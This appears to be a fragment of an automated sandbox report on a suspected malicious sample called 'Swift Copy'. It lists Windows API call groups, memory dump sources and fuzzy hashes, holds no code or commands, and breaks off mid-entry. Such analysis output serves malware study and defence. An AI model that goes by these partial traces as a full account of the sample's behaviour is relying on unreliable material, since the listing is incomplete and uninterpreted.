                                              • Instruction ID: 5de5a471b69d9bc3f77ca55e743af0ba3df93e86f92e7912c9ff1b825a6fbcbf
                                              • Opcode Fuzzy Hash: e6702ac207e2d2422681ec5051ac1de67c69a8770464e3364c95ceca61bf9b1a
                                              • Instruction Fuzzy Hash: B011C4B12053109FE7218F54DC08F92BFFCFB00B00F1085AAA666D6291E771E948DB60
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0C4
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0E9
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB0F3
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DDACD3,?,00008000), ref: 00DDB126
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: 9c157ab1dc004d607866828436e83060da48728a1854d95f4f4bff7cab98e86c
                                              • Instruction ID: 6e1e94b403b83c6701dfc7473b09a0e563e19eeefc28e1f463625cd3aa2baf27
                                              • Opcode Fuzzy Hash: 9c157ab1dc004d607866828436e83060da48728a1854d95f4f4bff7cab98e86c
                                              • Instruction Fuzzy Hash: F1115E31C0162CDBCF00AFE5D959AFEBB78FF0A725F124187D941B2241CB3095948BA1
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DD2DC5
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD2DD6
                                              • GetCurrentThreadId.KERNEL32 ref: 00DD2DDD
                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DD2DE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                              • Instruction ID: df641b4abfb2a4fcf8a264fb5b2bdd05c0c3a33261d8b473578d261443a562c4
                                              • Opcode Fuzzy Hash: 7da2a86503ee24e375bc1590faa369439a3f3bc5b14448a4cb7161aa4d6c3283
                                              • Instruction Fuzzy Hash: F6E06DB11012247AD7201BA3AC0DEFB3E6DEB56FA1F140216B106E11809AA6C888C6F0
                                              APIs
                                                • Part of subcall function 00D89639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896A2
                                                • Part of subcall function 00D89639: BeginPath.GDI32(?), ref: 00D896B9
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E08887
                                              • LineTo.GDI32(?,?,?), ref: 00E08894
                                              • EndPath.GDI32(?), ref: 00E088A4
                                              • StrokePath.GDI32(?), ref: 00E088B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: c1ad203d9ab6e74db58fb9bca32bf96ebd60b81746b8bff510ff6c9b6fa5c114
                                              • Instruction ID: f05eb49000e37c711071195388f2e1cba40fdc7cab4500cfb20df8ad8efa311d
                                              • Opcode Fuzzy Hash: c1ad203d9ab6e74db58fb9bca32bf96ebd60b81746b8bff510ff6c9b6fa5c114
                                              • Instruction Fuzzy Hash: 34F09A36002218FAEB122F95AC0AFCA3E29AF46310F548100FB01710E1C7760595CBE5
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00D898CC
                                              • SetTextColor.GDI32(?,?), ref: 00D898D6
                                              • SetBkMode.GDI32(?,00000001), ref: 00D898E9
                                              • GetStockObject.GDI32(00000005), ref: 00D898F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Color$ModeObjectStockText
                                              • String ID:
                                              • API String ID: 4037423528-0
                                              • Opcode ID: ac4ef964bd43fd7385fdb2ae9769a7df12d344128b9ca171557c968580cac554
                                              • Instruction ID: 2932c57328d53e4515e7ea746ea758c810646db1aabdd845e861f117f9d40e75
                                              • Opcode Fuzzy Hash: ac4ef964bd43fd7385fdb2ae9769a7df12d344128b9ca171557c968580cac554
                                              • Instruction Fuzzy Hash: 05E06531244240AEDB215B75AC09BE83F21AB11335F188319F6F9640E1C37246959F20
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00DD1634
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DD11D9), ref: 00DD163B
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DD11D9), ref: 00DD1648
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DD11D9), ref: 00DD164F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 0874fcbc611e09a4b9bc67a7abe139642fd07a4c60dbe99e21a01aaf9758d159
                                              • Instruction ID: 34f622024ab3928529e63fe2a7af2bf182452cf0018751b8f2459e85f7029684
                                              • Opcode Fuzzy Hash: 0874fcbc611e09a4b9bc67a7abe139642fd07a4c60dbe99e21a01aaf9758d159
                                              • Instruction Fuzzy Hash: 95E08635601211EFE7201FA29D0DB463B7CEF44791F288909F245E9090E6358489C760
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00DCD858
                                              • GetDC.USER32(00000000), ref: 00DCD862
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCD882
                                              • ReleaseDC.USER32(?), ref: 00DCD8A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: c51f30e030197519120484d6972dfffc62d36f31d3470784d06ee5e730c37ad3
                                              • Instruction ID: f8e990003cad0834e98f7a2cc863792671798f403e4fe8d8c288d20fa9cbd638
                                              • Opcode Fuzzy Hash: c51f30e030197519120484d6972dfffc62d36f31d3470784d06ee5e730c37ad3
                                              • Instruction Fuzzy Hash: 47E01270800205DFCF519FA1D80866DBBB2FF08710F208119F846F7250C7368545EF60
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00DCD86C
                                              • GetDC.USER32(00000000), ref: 00DCD876
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCD882
                                              • ReleaseDC.USER32(?), ref: 00DCD8A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 6ee42667de0d86d9559ad00731c6c28f76adb43c3709d99d7b70f2e8d7898482
                                              • Instruction ID: 6eb6c7c8837f91a952c6b73c9d0ce7e617f0811a6194dde84c3d2dec174a6622
                                              • Opcode Fuzzy Hash: 6ee42667de0d86d9559ad00731c6c28f76adb43c3709d99d7b70f2e8d7898482
                                              • Instruction Fuzzy Hash: 48E01A70800200DFCF50AFA1E80866DBBB1FB08710F208108E84AF7290CB3A59469F50
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DE4ED4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Connection_wcslen
                                              • String ID: *$LPT
                                              • API String ID: 1725874428-3443410124
                                              • Opcode ID: 5c621df17fb816d27bb937e57344b9d8537ae7ee7e6085d5ef6745a00f4f1d55
                                              • Instruction ID: ea424cca5810fd9adf1b69d67f3436e8e4a9160bc63b6f7d34f8ca197da5e252
                                              • Opcode Fuzzy Hash: 5c621df17fb816d27bb937e57344b9d8537ae7ee7e6085d5ef6745a00f4f1d55
                                              • Instruction Fuzzy Hash: 7B916D75A002449FCB14EF59C484EAABBF1FF44704F198099E84A9F3A2D731ED85CBA1
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00D9E30D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 335c75e23be3a4c2701bab8419074dc76dbd929b7a4446beb8d6906e17c5fc58
                                              • Instruction ID: ac28e551a3eb106a51ca29351399296834f23aefdafbd5b71bf16aeee5ccf028
                                              • Opcode Fuzzy Hash: 335c75e23be3a4c2701bab8419074dc76dbd929b7a4446beb8d6906e17c5fc58
                                              • Instruction Fuzzy Hash: 48516E71A0D202DACF15BB14CD013B97BA4EB41741F388DA8F0D5922E9EB35CCD59A76
                                              APIs
                                              • CharUpperBuffW.USER32(00DC569E,00000000,?,00E0CC08,?,00000000,00000000), ref: 00DF78DD
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • CharUpperBuffW.USER32(00DC569E,00000000,?,00E0CC08,00000000,?,00000000,00000000), ref: 00DF783B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper$_wcslen
                                              • String ID: <s
                                              • API String ID: 3544283678-2940880691
                                              • Opcode ID: 052a197052bbee959ebb84c6a2961b0914c85875599cf3595f7f55964c63868b
                                              • Instruction ID: 55d801e029df76a21b429b9df2e854f207302252fb5419c5b918fb1c2a373424
                                              • Opcode Fuzzy Hash: 052a197052bbee959ebb84c6a2961b0914c85875599cf3595f7f55964c63868b
                                              • Instruction Fuzzy Hash: 89614B72914119AACF14EBA4CC91DFDB378FF14700B59812AF646B7091FF60AA49DBB0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: b2c4c45cf5c6721a5878255d1caea98ee5edcb2f5f72b4f93d91c4afb69ba086
                                              • Instruction ID: 6bbd799d9cb89d05985b191b429d77dc39d1def1f6c7d88de4b5c991856c192b
                                              • Opcode Fuzzy Hash: b2c4c45cf5c6721a5878255d1caea98ee5edcb2f5f72b4f93d91c4afb69ba086
                                              • Instruction Fuzzy Hash: 595101B5504256EFDF25EF68C481FBA7BA4EF65310F288059E8919B2D0D634DD42CBB0
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00D8F2A2
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D8F2BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: 7d7f4fbff36931002bc94a00e7d3307a280aa14a916aa63e9548fceb764c24ab
                                              • Instruction ID: 7b09bfa6ef69c7e070799b22204157fe484c6bc23ea3ea13371ea11a78f6a092
                                              • Opcode Fuzzy Hash: 7d7f4fbff36931002bc94a00e7d3307a280aa14a916aa63e9548fceb764c24ab
                                              • Instruction Fuzzy Hash: 2C5142724187849FD320AF21DC86BAFBBF8FF95300F81885CF199511A5EB308529CB66
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DF57E0
                                              • _wcslen.LIBCMT ref: 00DF57EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_wcslen
                                              • String ID: CALLARGARRAY
                                              • API String ID: 157775604-1150593374
                                              • Opcode ID: d839881f98a24b4c23b0c56cde565aa1aa82cdfec8c485cb597b518ae215a064
                                              • Instruction ID: cecf9e4a576909aee4f00ee623ff55219cffe20a5724428389cd88e778f7dd56
                                              • Opcode Fuzzy Hash: d839881f98a24b4c23b0c56cde565aa1aa82cdfec8c485cb597b518ae215a064
                                              • Instruction Fuzzy Hash: 1941B331A001099FCB14DFA8E8818BEBBB5EF59350F158169F605A7295E7309D81CBB0
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DED130
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DED13A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CrackInternet_wcslen
                                              • String ID: |
                                              • API String ID: 596671847-2343686810
                                              • Opcode ID: ed84875872f9f36aab889884aa9becd346e9ea60188f638cbcfeb8de3d667711
                                              • Instruction ID: 1cec7b494e995d4a44e8bc9ae5651c841e4ebb93417e62ca86f53a1ba26ef656
                                              • Opcode Fuzzy Hash: ed84875872f9f36aab889884aa9becd346e9ea60188f638cbcfeb8de3d667711
                                              • Instruction Fuzzy Hash: EE310D71D00219ABCF15EFA5CC85AEE7FBAFF04340F104019F819A6165EB31A956DB71
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00E03621
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E0365C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
